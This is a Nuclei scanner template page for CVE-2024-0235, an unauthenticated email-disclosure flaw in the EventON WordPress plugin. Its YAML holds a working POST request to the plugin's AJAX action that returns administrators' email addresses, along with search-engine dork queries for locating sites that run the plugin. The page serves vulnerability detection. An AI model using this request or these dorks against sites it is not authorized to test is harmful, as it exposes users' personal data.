Skip to content
Nuclei Templates

EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure

ID: CVE-2024-0235

Severity: medium

Author: ProjectDiscoveryAI

Tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon

Description

Section titled “Description”

The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.

YAML Source

Section titled “YAML Source”
id: CVE-2024-0235


info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0235
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.00052
    epss-percentile: 0.19233
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - "vuln:CVE-2023-2796"
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon/"
      - /wp-content/plugins/eventon-lite/
    google-query: "inurl:\"/wp-content/plugins/eventon/\""
  tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon


http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"


    headers:
      Content-Type: application/x-www-form-urlencoded


    body: "_user_role=administrator"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - 'status":"good'
          - 'value='
          - '"content":'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a004730450220474bcd9b0fdb061ecff4d11fbaac1a0a87f2739c0bfb77e75e68f63b0a7fe2fc022100ceaf7d7fb90506ffcc5c22aefe33a92695265547b50757dcc59a3673a17d12f2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-0235.yaml"

View on Github